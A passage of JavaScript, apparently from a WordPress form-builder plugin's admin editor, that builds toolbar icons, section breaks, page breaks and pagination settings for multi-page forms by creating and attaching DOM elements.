	if(document.getElementById('editing_id').value)
	id=document.getElementById('editing_id').value;
	else
	id=gen;

   
   var td_for_hidden = document.getElementById(id+"_element_sectionform_id_temp");

   var hidden_input_row = document.createElement('input');
						hidden_input_row.setAttribute("id", id+"_hidden_rowform_id_temp");
						hidden_input_row.setAttribute("name", id+"_hidden_rowform_id_temp");
						hidden_input_row.setAttribute("type", "hidden");
						hidden_input_row.setAttribute("value", row_input);	
	
	var hidden_ids_row = document.createElement('input');
						hidden_ids_row.setAttribute("id", id+"_row_idsform_id_temp");
						hidden_ids_row.setAttribute("name", id+"_row_idsform_id_temp");
						hidden_ids_row.setAttribute("type", "hidden");
						hidden_ids_row.setAttribute("value", row_num);	
				
	var hidden_input_column = document.createElement('input');
						hidden_input_column.setAttribute("id", id+"_hidden_columnform_id_temp");
						hidden_input_column.setAttribute("name", id+"_hidden_columnform_id_temp");
						hidden_input_column.setAttribute("type", "hidden");
						hidden_input_column.setAttribute("value", column_input);

    var hidden_ids_column = document.createElement('input');
						hidden_ids_column.setAttribute("id", id+"_column_idsform_id_temp");
						hidden_ids_column.setAttribute("name", id+"_column_idsform_id_temp");
						hidden_ids_column.setAttribute("type", "hidden");
						hidden_ids_column.setAttribute("value", column_num);								
						
	td_for_hidden.appendChild(hidden_input_row);
	td_for_hidden.appendChild(hidden_ids_row);
	td_for_hidden.appendChild(hidden_input_column);
	td_for_hidden.appendChild(hidden_ids_column);
	
	
	}
	if(document.getElementById("element_type").value=="type_section_break")
	{
		form_view=0;
		for(t=form_view_max; t>0; t--)
		{
			if(document.getElementById('form_id_tempform_view'+t))
				if(jQuery("#form_id_tempform_view"+t).is(":visible"))
				{
					form_view=t;
          form_maker_remove_spaces(document.getElementById('form_id_tempform_view' + form_view));
					break;
				}
		}
	
		if(form_view==0)
		{	alert("The pages are closed");
			return;
		}
		
		if(document.getElementById('editing_id').value)
		{
			i=document.getElementById('editing_id').value;		
			document.getElementById('editing_id').value="";
			tr=document.getElementById(i);
			destroyChildren(tr);
			var img_X = document.createElement("img");
					img_X.setAttribute("src", fmc_plugin_url+"/images/delete_el.png");
					// img_X.setAttribute("height", "20");
					img_X.setAttribute("title", "Remove the field");
					img_X.style.cssText = "cursor:pointer; margin:2px";
					img_X.setAttribute("onclick", 'remove_section_break("'+i+'")');
          img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"delete_el")');
					img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"delete_el")');
					
			var td_X = document.createElement("td");
					td_X.setAttribute("id", "X_"+i);
					td_X.setAttribute("valign", "middle");
					td_X.setAttribute("align", "right");
					td_X.setAttribute("class", "element_toolbar");
					td_X.appendChild(img_X);
//image pah@
			var img_UP = document.createElement("img");
					img_UP.setAttribute("src", fmc_plugin_url+"/images/up.png");
					img_UP.setAttribute("title", "Move the field up");
//				img_UP.setAttribute("height", "17");
					img_UP.style.cssText = "cursor:pointer";
					img_UP.setAttribute("onclick", 'up_row("'+i+'")');
          img_UP.setAttribute("onmouseover", 'chnage_icons_src(this,"up")');
					img_UP.setAttribute("onmouseout", 'chnage_icons_src(this,"up")');
					
			var td_UP = document.createElement("td");
					td_UP.setAttribute("id", "up_"+i);
					td_UP.setAttribute("valign", "middle");
					td_UP.setAttribute("class", "element_toolbar");
					td_UP.appendChild(img_UP);
					
			var img_DOWN = document.createElement("img");
					img_DOWN.setAttribute("src", fmc_plugin_url+"/images/down.png");
					img_DOWN.setAttribute("title", "Move the field down");
//				img_DOWN.setAttribute("height", "17");
					img_DOWN.style.cssText = "margin:2px;cursor:pointer";
					img_DOWN.setAttribute("onclick", 'down_row("'+i+'")');
          img_DOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"down")');
					img_DOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"down")');
					
			var td_DOWN = document.createElement("td");
					td_DOWN.setAttribute("id", "down_"+i);
					td_DOWN.setAttribute("valign", "middle");
					td_DOWN.setAttribute("class", "element_toolbar");
					td_DOWN.appendChild(img_DOWN);
					
			var img_EDIT = document.createElement("img");
					img_EDIT.setAttribute("src", fmc_plugin_url+"/images/edit.png");
					img_EDIT.setAttribute("title", "Edit the field");
//				img_EDIT.setAttribute("height", "17");
					img_EDIT.style.cssText = "margin:2px;cursor:pointer";
					img_EDIT.setAttribute("onclick", 'edit("'+i+'")');
          img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
					img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
					
			var td_EDIT = document.createElement("td");
					td_EDIT.setAttribute("id", "edit_"+i);
					td_EDIT.setAttribute("valign", "middle");
					td_EDIT.setAttribute("class", "element_toolbar");
					td_EDIT.appendChild(img_EDIT);
		
			var img_DUBLICATE = document.createElement("img");
					img_DUBLICATE.setAttribute("src", fmc_plugin_url+"/images/dublicate.png");
					img_DUBLICATE.setAttribute("title", "Duplicate the field");
					img_DUBLICATE.style.cssText = "margin:2px;cursor:pointer";
					img_DUBLICATE.setAttribute("onclick", 'dublicate("'+i+'")');
          img_DUBLICATE.setAttribute("onmouseover", 'chnage_icons_src(this,"dublicate")');
					img_DUBLICATE.setAttribute("onmouseout", 'chnage_icons_src(this,"dublicate")');
					
			var td_DUBLICATE = document.createElement("td");
					td_DUBLICATE.setAttribute("id", "dublicate_"+i);
					td_DUBLICATE.setAttribute("valign", "middle");
					td_DUBLICATE.setAttribute("class", "element_toolbar");
					td_DUBLICATE.appendChild(img_DUBLICATE);
		
			var img_PAGEUP = document.createElement("img");
					img_PAGEUP.setAttribute("src", fmc_plugin_url+"/images/page_up.png");
					img_PAGEUP.setAttribute("title", "Move the field to the upper page");
					img_PAGEUP.style.cssText = "margin:2px;cursor:pointer";
					img_PAGEUP.setAttribute("onclick", 'page_up("'+i+'")');
          img_PAGEUP.setAttribute("onmouseover", 'chnage_icons_src(this,"page_up")');
					img_PAGEUP.setAttribute("onmouseout", 'chnage_icons_src(this,"page_up")');
					
			var td_PAGEDOWN = document.createElement("td");
					td_PAGEDOWN.setAttribute("id", "page_up_"+i);
					td_PAGEDOWN.setAttribute("valign", "middle");
					td_PAGEDOWN.setAttribute("class", "element_toolbar");
					td_PAGEDOWN.appendChild(img_PAGEUP);
					
			var img_PAGEDOWN = document.createElement("img");
					img_PAGEDOWN.setAttribute("src", fmc_plugin_url+"/images/page_down.png");
					img_PAGEDOWN.setAttribute("title", "Move the field to the lower  page");
					img_PAGEDOWN.style.cssText = "margin:2px;cursor:pointer";
					img_PAGEDOWN.setAttribute("onclick", 'page_down("'+i+'")');
          img_PAGEDOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"page_down")');
					img_PAGEDOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"page_down")');
					
			var td_PAGEUP = document.createElement("td");
					td_PAGEUP.setAttribute("id", "dublicate_"+i);
					td_PAGEUP.setAttribute("valign", "middle");
					td_PAGEUP.setAttribute("class", "element_toolbar");
					td_PAGEUP.appendChild(img_PAGEDOWN);
      ///////////////////////////////////////////////////////////////////////////////////////////////
			var in_editor = document.createElement("td");
					in_editor.setAttribute("id", i+"_element_sectionform_id_temp");
         			in_editor.setAttribute("align", 'left');
					in_editor.setAttribute("valign", "top");
					in_editor.setAttribute("colspan", "100");
					in_editor.setAttribute('class', 'toolbar_padding');
					
	
		if (document.getElementById("form_maker_editor_ifr") && document.getElementById('form_maker_editor').style.display == "none") {
      ifr_id = "form_maker_editor_ifr";
				ifr=getIFrameDocument(ifr_id);
				in_editor.innerHTML=ifr.body.innerHTML;
		}
		else
		{
				in_editor.innerHTML=document.getElementById('form_maker_editor').value;
		}
			
			var label = document.createElement('span');
					label.setAttribute("id", i+"_element_labelform_id_temp");
					label.innerHTML = "custom_"+i;
					label.style.cssText = 'display:none';
					
			td_EDIT.appendChild(label);
			tr.appendChild(in_editor);
			tr.appendChild(td_X);
			tr.appendChild(td_EDIT);
			tr.appendChild(td_DUBLICATE);
			j=2;
		}
		else
		{
			i=gen;
			gen++;
			
			var tr = document.createElement('tr');
				tr.setAttribute("id", i);
				tr.setAttribute("class", "wdform_tr_section_break");
				tr.setAttribute("type", "type_section_break");
				
				
			var select_ = document.getElementById('sel_el_pos');
			var option = document.createElement('option');
				option.setAttribute("id", i+"_sel_el_pos");
				option.setAttribute("value", i);
				option.innerHTML="custom_"+i;
				
			table=document.getElementById('form_id_tempform_view'+form_view);

			var img_X = document.createElement("img");
					img_X.setAttribute("src", fmc_plugin_url+"/images/delete_el.png");
					// img_X.setAttribute("height", "20");
					img_X.setAttribute("title", "Remove the field");
					img_X.style.cssText = "cursor:pointer; margin:2px";
					img_X.setAttribute("onclick", 'remove_section_break("'+i+'")');
          img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"delete_el")');
					img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"delete_el")');
					
			var td_X = document.createElement("td");
					td_X.setAttribute("id", "X_"+i);
					td_X.setAttribute("valign", "middle");
					td_X.setAttribute("align", "right");
					td_X.setAttribute("class", "element_toolbar");
					td_X.appendChild(img_X);
//image pah@
			var img_UP = document.createElement("img");
					img_UP.setAttribute("src", fmc_plugin_url+"/images/up.png");
					img_UP.setAttribute("title", "Move the field up");
//				img_UP.setAttribute("height", "17");
					img_UP.style.cssText = "cursor:pointer";
					img_UP.setAttribute("onclick", 'up_row("'+i+'")');
          img_UP.setAttribute("onmouseover", 'chnage_icons_src(this,"up")');
					img_UP.setAttribute("onmouseout", 'chnage_icons_src(this,"up")');
					
			var td_UP = document.createElement("td");
					td_UP.setAttribute("id", "up_"+i);
					td_UP.setAttribute("valign", "middle");
					td_UP.setAttribute("class", "element_toolbar");
					td_UP.appendChild(img_UP);
					
			var img_DOWN = document.createElement("img");
					img_DOWN.setAttribute("src", fmc_plugin_url+"/images/down.png");
					img_DOWN.setAttribute("title", "Move the field down");
//				img_DOWN.setAttribute("height", "17");
					img_DOWN.style.cssText = "margin:2px;cursor:pointer";
					img_DOWN.setAttribute("onclick", 'down_row("'+i+'")');
          img_DOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"down")');
					img_DOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"down")');
					
			var td_DOWN = document.createElement("td");
					td_DOWN.setAttribute("id", "down_"+i);
					td_DOWN.setAttribute("valign", "middle");
					td_DOWN.setAttribute("class", "element_toolbar");
					td_DOWN.appendChild(img_DOWN);
					
					
			var img_EDIT = document.createElement("img");
					img_EDIT.setAttribute("src", fmc_plugin_url+"/images/edit.png");
					img_EDIT.setAttribute("title", "Edit the field");
//				img_EDIT.setAttribute("height", "17");
					img_EDIT.style.cssText = "margin:2px;cursor:pointer";
					img_EDIT.setAttribute("onclick", 'edit("'+i+'")');
          img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
					img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
					
			var td_EDIT = document.createElement("td");
					td_EDIT.setAttribute("id", "edit_"+i);
					td_EDIT.setAttribute("valign", "middle");
					td_EDIT.setAttribute("class", "element_toolbar");
					td_EDIT.appendChild(img_EDIT);
		
			var img_DUBLICATE = document.createElement("img");
					img_DUBLICATE.setAttribute("src", fmc_plugin_url+"/images/dublicate.png");
					img_DUBLICATE.setAttribute("title", "Duplicate the field");
					img_DUBLICATE.style.cssText = "margin:2px;cursor:pointer";
					img_DUBLICATE.setAttribute("onclick", 'dublicate("'+i+'")');
          img_DUBLICATE.setAttribute("onmouseover", 'chnage_icons_src(this,"dublicate")');
					img_DUBLICATE.setAttribute("onmouseout", 'chnage_icons_src(this,"dublicate")');
					
			var td_DUBLICATE = document.createElement("td");
					td_DUBLICATE.setAttribute("id", "dublicate_"+i);
					td_DUBLICATE.setAttribute("valign", "middle");
					td_DUBLICATE.setAttribute("class", "element_toolbar");
					td_DUBLICATE.appendChild(img_DUBLICATE);
					
			var img_PAGEUP = document.createElement("img");
					img_PAGEUP.setAttribute("src", fmc_plugin_url+"/images/page_up.png");
					img_PAGEUP.setAttribute("title", "Move the field to the upper page");
					img_PAGEUP.style.cssText = "margin:2px;cursor:pointer";
					img_PAGEUP.setAttribute("onclick", 'page_up("'+i+'")');
          img_PAGEUP.setAttribute("onmouseover", 'chnage_icons_src(this,"page_up")');
					img_PAGEUP.setAttribute("onmouseout", 'chnage_icons_src(this,"page_up")');
					
			var td_PAGEDOWN = document.createElement("td");
					td_PAGEDOWN.setAttribute("id", "page_up_"+i);
					td_PAGEDOWN.setAttribute("valign", "middle");
					td_PAGEDOWN.setAttribute("class", "element_toolbar");
					td_PAGEDOWN.appendChild(img_PAGEUP);
					
			var img_PAGEDOWN = document.createElement("img");
					img_PAGEDOWN.setAttribute("src", fmc_plugin_url+"/images/page_down.png");
					img_PAGEDOWN.setAttribute("title", "Move the field to the lower  page");
					img_PAGEDOWN.style.cssText = "margin:2px;cursor:pointer";
					img_PAGEDOWN.setAttribute("onclick", 'page_down("'+i+'")');
          img_PAGEDOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"page_down")');
					img_PAGEDOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"page_down")');
					
			var td_PAGEUP = document.createElement("td");
					td_PAGEUP.setAttribute("id", "dublicate_"+i);
					td_PAGEUP.setAttribute("valign", "middle");
					td_PAGEUP.setAttribute("class", "element_toolbar");
					td_PAGEUP.appendChild(img_PAGEDOWN);
///////////////////////////////////////////////////////////////////////////////////////////////
			var in_editor = document.createElement("td");
					in_editor.setAttribute("id", i+"_element_sectionform_id_temp");
         			in_editor.setAttribute("align", 'left');
					in_editor.setAttribute("valign", "top");
					in_editor.setAttribute("colspan", "100");
					in_editor.setAttribute('class', 'toolbar_padding');
					


		if (document.getElementById("form_maker_editor_ifr") && document.getElementById('form_maker_editor').style.display == "none") {
      ifr_id = "form_maker_editor_ifr";
				ifr=getIFrameDocument(ifr_id)
				in_editor.innerHTML=ifr.body.innerHTML;
		}
		else
		{
				in_editor.innerHTML=document.getElementById('form_maker_editor').value;
		}
			
			
			
			var label = document.createElement('span');
					label.setAttribute("id", i+"_element_labelform_id_temp");
					label.innerHTML = "custom_"+i;
					label.style.cssText = 'display:none';
					
			td_EDIT.appendChild(label);
			tr.appendChild(in_editor);

			tr.appendChild(td_X);
			tr.appendChild(td_EDIT);
			tr.appendChild(td_DUBLICATE);

			
				beforeTr=table.lastChild;
				table.insertBefore(tr, beforeTr);
				
		tr=document.createElement('tr');
			tr.setAttribute('class','wdform_tr1');
		td=document.createElement('td');
			td.setAttribute('class','wdform_td1');
		table_min=document.createElement('table');
			table_min.setAttribute('class','wdform_table2');
		tbody_min=document.createElement('tbody');
			tbody_min.setAttribute('class','wdform_tbody2');
		
		table_min.appendChild(tbody_min);
		td.appendChild(table_min);
		tr.appendChild(td);
		
				beforeTr=table.lastChild;
				table.insertBefore(tr, beforeTr);
				
			j=2;
			
						

		
		}

	close_window();
	return;
	}

	
	if(document.getElementById("element_type").value=="type_page_navigation")
	{
		document.getElementById("pages").setAttribute('show_title',document.getElementById("el_show_title_input").checked);
		document.getElementById("pages").setAttribute('show_numbers',document.getElementById("el_show_numbers_input").checked);
	
		if(document.getElementById("el_pagination_steps").checked)
			{
				document.getElementById("pages").setAttribute('type','steps');
				make_page_steps_front();
			}
		else
			if(document.getElementById("el_pagination_percentage").checked)
			{
				document.getElementById("pages").setAttribute('type','percentage');
				make_page_percentage_front();
			}
			else
			{
				document.getElementById("pages").setAttribute('type','none');
				make_page_none_front();
			}
		
		refresh_page_numbers();
		close_window() ;
		
		return;

	}

	if(document.getElementById("element_type").value=="type_page_break")
	{
		
		
		
		if(document.getElementById("editing_id").value)
		{	
			i=document.getElementById("editing_id").value;
			form_view_element	=document.getElementById('form_id_tempform_view'+i);
			page_title			=document.getElementById('_div_between').getAttribute('page_title');
			next_title			=document.getElementById('_div_between').getAttribute('next_title');
			next_type			=document.getElementById('_div_between').getAttribute('next_type');
			next_class			=document.getElementById('_div_between').getAttribute('next_class');
			next_checkable		=document.getElementById('_div_between').getAttribute('next_checkable');
			previous_title		=document.getElementById('_div_between').getAttribute('previous_title');
			previous_type		=document.getElementById('_div_between').getAttribute('previous_type');
			previous_class		=document.getElementById('_div_between').getAttribute('previous_class');
			previous_checkable	=document.getElementById('_div_between').getAttribute('previous_checkable');
			form_view_element.setAttribute('next_title',next_title);
			form_view_element.setAttribute('next_type',next_type);
			form_view_element.setAttribute('next_class',next_class);
			form_view_element.setAttribute('next_checkable',next_checkable);
			form_view_element.setAttribute('previous_title',previous_title);
			form_view_element.setAttribute('previous_type',previous_type);
			form_view_element.setAttribute('previous_class',previous_class);
			form_view_element.setAttribute('previous_checkable',previous_checkable);
			form_view_element.setAttribute('page_title',page_title);
			
			var input = document.getElementById('_div_between'); 
			atr=input.attributes;
			for(v=0;v<30;v++)
				if(atr[v] )
				{
					if(atr[v].name.indexOf("add_")==0)
					{
						form_view_element.setAttribute(atr[v].name,atr[v].value);
					}
				}
				
			if(form_view_count!=1)
				generate_page_nav(form_view);
			
			close_window() ;
			return;
		}
		else
		{	

			for(t=form_view_max; t>0; t--)
			{
				if(document.getElementById('form_id_tempform_view'+t))
				{
						form_view=t;
						break;
				}
			}
		
		
		

			if(form_view_count==1)
			{
				
				var img_EDIT = document.createElement("img");
						img_EDIT.setAttribute("src", fmc_plugin_url+"/images/edit.png");
						img_EDIT.setAttribute("title", "Edit the pagination options");
						img_EDIT.style.cssText = "margin-left:40px; cursor:pointer";
						img_EDIT.setAttribute("onclick", 'el_page_navigation()');
            img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
            img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
						
				var td_EDIT = document.getElementById("edit_page_navigation");
						td_EDIT.appendChild(img_EDIT);
				
				document.getElementById('page_navigation').appendChild(td_EDIT);

			}
		
		old_to_gen=form_view;
		
		form_view_max++;
		form_view_count++;
		form_view=form_view_max;
		
		table=document.createElement('table');
			table.setAttribute('cellpadding','4');
			table.setAttribute('cellspacing','0');
			table.setAttribute('class','wdform_table1');
			table.style.cssText = "border-top:1px solid black";
 
 
		tbody=document.createElement('tbody');
			tbody.setAttribute('id','form_id_tempform_view'+form_view);
			tbody.setAttribute('page_title','Untitled Page');
			tbody.setAttribute('class','wdform_tbody1');
			
		tbody_img=document.createElement('tbody');
			tbody_img.setAttribute('id','form_id_tempform_view_img'+form_view);
			tbody_img.style.cssText = "float:right";
			
		tr_img=document.createElement('tr');
			tr_img.setAttribute('valign','middle');
		td_title=document.createElement('td');
			td_title.setAttribute('width','0%');
		td_img=document.createElement('td');
			td_img.setAttribute('align','right');
			
		var	img=document.createElement('img');
			img.setAttribute('src',fmc_plugin_url+'/images/minus.png');
			img.setAttribute('title','Show or hide the page');
			img.setAttribute("class", "page_toolbar");
			img.setAttribute('id','show_page_img_'+form_view);
			img.setAttribute('onClick','show_or_hide("'+form_view+'")');
      img.setAttribute("onmouseover", 'chnage_icons_src(this,"minus")');
			img.setAttribute("onmouseout", 'chnage_icons_src(this,"minus")');

			
		var img_X = document.createElement("img");
			img_X.setAttribute("src", fmc_plugin_url+"/images/page_delete.png");
			img_X.setAttribute('title','Delete the page');
			img_X.setAttribute("class", "page_toolbar");
			img_X.setAttribute("onclick", 'remove_page("'+form_view+'")');
      img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"page_delete")');
			img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"page_delete")');
					
		var td_X = document.createElement("td");
			td_X.appendChild(img_X);
			
		var img_X_all = document.createElement("img");
			img_X_all.setAttribute("src", fmc_plugin_url+"/images/page_delete_all.png");
			img_X_all.setAttribute('title','Delete the page with fields');
			img_X_all.setAttribute("class", "page_toolbar");
			img_X_all.setAttribute("onclick", 'remove_page_all("'+form_view+'")');
      img_X_all.setAttribute("onmouseover", 'chnage_icons_src(this,"page_delete_all")');
			img_X_all.setAttribute("onmouseout", 'chnage_icons_src(this,"page_delete_all")');
					
		var td_X_all = document.createElement("td");
			td_X_all.appendChild(img_X_all);
			
		var img_EDIT = document.createElement("img");
			img_EDIT.setAttribute("src", fmc_plugin_url+"/images/page_edit.png");
			img_EDIT.setAttribute('title','Edit the page');
			img_EDIT.setAttribute("class", "page_toolbar");
			img_EDIT.setAttribute("onclick", 'edit_page_break("'+form_view+'")');
      img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"page_edit")');
			img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"page_edit")');
					
		var td_EDIT = document.createElement("td");
			td_EDIT.appendChild(img_EDIT);			
			
		td_img.appendChild(img);
		tr_img.appendChild(td_title);
		tr_img.appendChild(td_img);
		tr_img.appendChild(td_X);
		tr_img.appendChild(td_X_all);
		tr_img.appendChild(td_EDIT);
		tbody_img.appendChild(tr_img);
			
			
		tr=document.createElement('tr');
			tr.setAttribute('class','wdform_tr1');
		td=document.createElement('td');
			td.setAttribute('class','wdform_td1');
			
			
		tr_page_nav=document.createElement('tr');
			tr_page_nav.setAttribute('valign','top');
			tr_page_nav.setAttribute('class','wdform_footer');
			
		td_page_nav=document.createElement('td');
			td_page_nav.setAttribute('colspan','100');
			
		table_min_page_nav=document.createElement('table');
			table_min_page_nav.setAttribute('width','100%');
			
		tbody_min_page_nav=document.createElement('tbody');
		tr_min_page_nav=document.createElement('tr');
			tr_min_page_nav.setAttribute('id','form_id_temppage_nav'+form_view);
			
		table_min=document.createElement('table');
			table_min.setAttribute('class','wdform_table2');
		tbody_min=document.createElement('tbody');
			tbody_min.setAttribute('class','wdform_tbody2');
			
		table_min.appendChild(tbody_min);
		td.appendChild(table_min);
		tr.appendChild(td);
		tbody_min_page_nav.appendChild(tr_min_page_nav);
		table_min_page_nav.appendChild(tbody_min_page_nav);
		td_page_nav.appendChild(table_min_page_nav);
		tr_page_nav.appendChild(td_page_nav);
		tbody.appendChild(tr);
		tbody.appendChild(tr_page_nav);
		table.appendChild(tbody);
		table.appendChild(tbody_img);
		
		document.getElementById('take').appendChild(table);
		
		
		
		
		
		
		
	
		form_view_element	=document.getElementById('form_id_tempform_view'+form_view);
		page_title			=document.getElementById('_div_between').getAttribute('page_title');
		next_title			=document.getElementById('_div_between').getAttribute('next_title');
		next_type			=document.getElementById('_div_between').getAttribute('next_type');
		next_class			=document.getElementById('_div_between').getAttribute('next_class');
		next_checkable		=document.getElementById('_div_between').getAttribute('next_checkable');
		previous_title		=document.getElementById('_div_between').getAttribute('previous_title');
		previous_type		=document.getElementById('_div_between').getAttribute('previous_type');
		previous_class		=document.getElementById('_div_between').getAttribute('previous_class');
		previous_checkable	=document.getElementById('_div_between').getAttribute('previous_checkable');
		form_view_element.setAttribute('next_title',next_title);
		form_view_element.setAttribute('next_type',next_type);
		form_view_element.setAttribute('next_class',next_class);
		form_view_element.setAttribute('next_checkable',next_checkable);
		form_view_element.setAttribute('previous_title',previous_title);
		form_view_element.setAttribute('previous_type',previous_type);
		form_view_element.setAttribute('previous_class',previous_class);
		form_view_element.setAttribute('previous_checkable',previous_checkable);
		form_view_element.setAttribute('page_title',page_title);
			
		
		var input = document.getElementById('_div_between'); 
		atr=input.attributes;
		
		for(v=0;v<30;v++)
			if(atr[v] )
			{
				if(atr[v].name.indexOf("add_")==0)
				{
					form_view_element.setAttribute(atr[v].name,atr[v].value);
				}
			}
			
	if(form_view_count==2)
	{
		generate_page_nav(form_view);
		generate_page_nav(old_to_gen);
	/*	show_form_view(form_view);
		show_form_view(old_to_gen);*/
	}
	else
		generate_page_nav(form_view);

		close_window() ;

		return;
		
		}  
		
	}
	
	form_view=0;
	for(t=form_view_max; t>0; t--)
	{
		if(document.getElementById('form_id_tempform_view'+t))
			if(jQuery("#form_id_tempform_view"+t).is(":visible"))
			{
				form_view=t;
				break;
			}
	}

	if(form_view==0)
	{	alert("The pages are closed");
		return;
	}

	
	if(document.getElementById('main_editor').style.display=="block")
	{
		if(document.getElementById('editing_id').value)
		{
			i=document.getElementById('editing_id').value;		
			document.getElementById('editing_id').value="";
			tr=document.getElementById(i);
			destroyChildren(tr);
			var img_X = document.createElement("img");
					img_X.setAttribute("src", fmc_plugin_url+"/images/delete_el.png");
					// img_X.setAttribute("height", "20");
					img_X.setAttribute("title", "Remove the field");
					img_X.style.cssText = "cursor:pointer; margin:2px";
					img_X.setAttribute("onclick", 'remove_row("'+i+'")');
          img_X.setAttribute("onmouseover", 'chnage_icons_src(this,"delete_el")');
					img_X.setAttribute("onmouseout", 'chnage_icons_src(this,"delete_el")');
					
			var td_X = document.createElement("td");
					td_X.setAttribute("id", "X_"+i);
					td_X.setAttribute("valign", "middle");
					td_X.setAttribute("align", "right");
					td_X.setAttribute("class", "element_toolbar");
					td_X.appendChild(img_X);
//image pah@
			var img_UP = document.createElement("img");
					img_UP.setAttribute("src", fmc_plugin_url+"/images/up.png");
					img_UP.setAttribute("title", "Move the field up");
//					img_UP.setAttribute("height", "17");
					img_UP.style.cssText = "cursor:pointer";
					img_UP.setAttribute("onclick", 'up_row("'+i+'")');
          img_UP.setAttribute("onmouseover", 'chnage_icons_src(this,"up")');
					img_UP.setAttribute("onmouseout", 'chnage_icons_src(this,"up")');
					
			var td_UP = document.createElement("td");
					td_UP.setAttribute("id", "up_"+i);
					td_UP.setAttribute("valign", "middle");
					td_UP.setAttribute("class", "element_toolbar");
					td_UP.appendChild(img_UP);
					
			var img_DOWN = document.createElement("img");
					img_DOWN.setAttribute("src", fmc_plugin_url+"/images/down.png");
					img_DOWN.setAttribute("title", "Move the field down");
//					img_DOWN.setAttribute("height", "17");
					img_DOWN.style.cssText = "margin:2px;cursor:pointer";
					img_DOWN.setAttribute("onclick", 'down_row("'+i+'")');
          img_DOWN.setAttribute("onmouseover", 'chnage_icons_src(this,"down")');
					img_DOWN.setAttribute("onmouseout", 'chnage_icons_src(this,"down")');
					
			var td_DOWN = document.createElement("td");
					td_DOWN.setAttribute("id", "down_"+i);
					td_DOWN.setAttribute("valign", "middle");
					td_DOWN.setAttribute("class", "element_toolbar");
					td_DOWN.appendChild(img_DOWN);
					
			var img_RIGHT = document.createElement("img");
					img_RIGHT.setAttribute("src", fmc_plugin_url+"/images/right.png");
					img_RIGHT.setAttribute("title", "Move the field to the right");
//					img_RIGHT.setAttribute("height", "17");
					img_RIGHT.style.cssText = "cursor:pointer";
					img_RIGHT.setAttribute("onclick", 'right_row("'+i+'")');
          img_RIGHT.setAttribute("onmouseover", 'chnage_icons_src(this,"right")');
					img_RIGHT.setAttribute("onmouseout", 'chnage_icons_src(this,"right")');
					
			var td_RIGHT = document.createElement("td");
					td_RIGHT.setAttribute("id", "right_"+i);
					td_RIGHT.setAttribute("valign", "middle");
					td_RIGHT.setAttribute("class", "element_toolbar");
					td_RIGHT.appendChild(img_RIGHT);
					
			var img_LEFT = document.createElement("img");
					img_LEFT.setAttribute("src", fmc_plugin_url+"/images/left.png");
					img_LEFT.setAttribute("title", "Move the field to the left");
//					img_LEFT.setAttribute("height", "17");
					img_LEFT.style.cssText = "margin:2px;cursor:pointer";
					img_LEFT.setAttribute("onclick", 'left_row("'+i+'")');
          img_LEFT.setAttribute("onmouseover", 'chnage_icons_src(this,"left")');
					img_LEFT.setAttribute("onmouseout", 'chnage_icons_src(this,"left")');
					
			var td_LEFT = document.createElement("td");
					td_LEFT.setAttribute("id", "left_"+i);
					td_LEFT.setAttribute("valign", "middle");
					td_LEFT.setAttribute("class", "element_toolbar");
					td_LEFT.appendChild(img_LEFT);
					
			var img_EDIT = document.createElement("img");
					img_EDIT.setAttribute("src", fmc_plugin_url+"/images/edit.png");
					img_EDIT.setAttribute("title", "Edit the field");
//					img_EDIT.setAttribute("height", "17");
					img_EDIT.style.cssText = "margin:2px;cursor:pointer";
					img_EDIT.setAttribute("onclick", 'edit("'+i+'")');
          img_EDIT.setAttribute("onmouseover", 'chnage_icons_src(this,"edit")');
					img_EDIT.setAttribute("onmouseout", 'chnage_icons_src(this,"edit")');
					
			var td_EDIT = document.createElement("td");
					td_EDIT.setAttribute("id", "edit_"+i);
					td_EDIT.setAttribute("valign", "middle");
					td_EDIT.setAttribute("class", "element_toolbar");
					td_EDIT.appendChild(img_EDIT);
		
			var img_DUBLICATE = document.createElement("img");
					img_DUBLICATE.setAttribute("src", fmc_plugin_url+"/images/dublicate.png");
					img_DUBLICATE.setAttribute("title", "Duplicate the field");
					img_DUBLICATE.style.cssText = "margin:2px;cursor:pointer";
					img_DUBLICATE.setAttribute("onclick", 'dublicate("'+i+'")');
          img_DUBLICATE.setAttribute("onmouseover", 'chnage_icons_src(this,"dublicate")');
					img_DUBLICATE.setAttribute("onmouseout", 'chnage_icons_src(this,"dublicate")');
					
			var td_DUBLICATE = document.createElement("td");
					td_DUBLICATE.setAttribute("id", "dublicate_"+i);
					td_DUBLICATE.setAttribute("valign", "middle");
					td_DUBLICATE.setAttribute("class", "element_toolbar");
					td_DUBLICATE.appendChild(img_DUBLICATE);
		
			var img_PAGEUP = document.createElement("img");
					img_PAGEUP.setAttribute("src", fmc_plugin_url+"/images/page_up.png");
					img_PAGEUP.setAttribute("title", "Move the field to the upper page");
					img_PAGEUP.style.cssText = "margin:2px;cursor:pointer";
					img_PAGEUP.setAttribute("onclick", 'page_up("'+i+'")');
          img_PAGEUP.setAttribute("onmouseover", 'chnage_icons_src(this,"page_up")');
					img_PAGEUP.setAttribute("onmouseout", 'chnage_icons_src(this,"page_up")');
					
			var td_PAGEDOWN = document.createElement("td");
					td_PAGEDOWN.setAttribute("id", "page_up_"+i);
					td_PAGEDOWN.setAttribute("valign", "middle");
					td_PAGEDOWN.setAttribute("class", "element_toolbar");
					td_PAGEDOWN.appendChild(img_PAGEUP);
					
			var img_PAGEDOWN = document.createElement("img");
